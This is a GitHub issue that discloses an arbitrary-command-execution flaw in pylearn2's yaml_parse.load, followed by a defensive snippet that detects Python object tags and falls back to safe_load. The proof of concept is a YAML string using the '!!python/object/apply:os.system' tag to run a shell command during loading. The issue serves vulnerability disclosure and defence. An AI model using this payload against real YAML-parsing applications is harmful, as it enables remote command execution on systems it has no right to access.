yaml_parse.load method is vulnerable #1593

Open
bigbigliang-malwarebenchmark opened this issue Dec 11, 2018 · 1 comment

Comments

@bigbigliang-malwarebenchmark

```python
import pylearn2.config.yaml_parse

# PyYAML tag that calls os.system("ls") while the document is being loaded
test_str = '!!python/object/apply:os.system ["ls"]'
test_load = pylearn2.config.yaml_parse.load(test_str)
```

Hi, there is a vulnerability in the load methods in pylearn2.config.yaml_parse.py; please see the PoC above. It can execute arbitrary Python commands, resulting in command execution.
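A defensive check for the report above, as an added example that is not part of the original issue or of pylearn2's code: it uses PyYAML (assumed installed) to list `python/*` tags from parser events, so nothing is constructed, and then loads only with `yaml.safe_load`. The function names and the benign sample are assumptions made for illustration.

```python
import yaml

# Fully resolved prefix of PyYAML's Python-specific tags; the parser has
# already expanded the "!!" shorthand by the time an event is emitted.
PYTHON_TAG_PREFIX = "tag:yaml.org,2002:python/"


def python_tags(text):
    """Return the python/* tags found in `text` without constructing objects."""
    found = []
    # yaml.parse() yields parser events only; no constructor runs, so nothing
    # named by a tag is imported or called.
    for event in yaml.parse(text, Loader=yaml.SafeLoader):
        tag = getattr(event, "tag", None)
        if tag and tag.startswith(PYTHON_TAG_PREFIX):
            found.append(tag)
    return found


def load_untrusted(text):
    """Refuse documents carrying python/* tags, then load with the safe loader."""
    tags = python_tags(text)
    if tags:
        raise ValueError("refusing YAML with Python object tags: " + ", ".join(tags))
    return yaml.safe_load(text)


def rejected_by_safe_load(text):
    """True if yaml.safe_load refuses `text` because of an unknown tag."""
    try:
        yaml.safe_load(text)
    except yaml.constructor.ConstructorError:
        return True
    return False


# The string from the report, and a constructed benign config for comparison.
REPORTED = '!!python/object/apply:os.system ["ls"]'
BENIGN = "learning_rate: 0.01\nlayers: [100, 50]\n"

if __name__ == "__main__":
    print(python_tags(REPORTED))
    print(rejected_by_safe_load(REPORTED))
    print(load_untrusted(BENIGN))
```

`python_tags` can also be run over stored configuration files to report which ones carry such tags before any of them is loaded.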

@nouiz
Member

nouiz commented Dec 11, 2018 via email
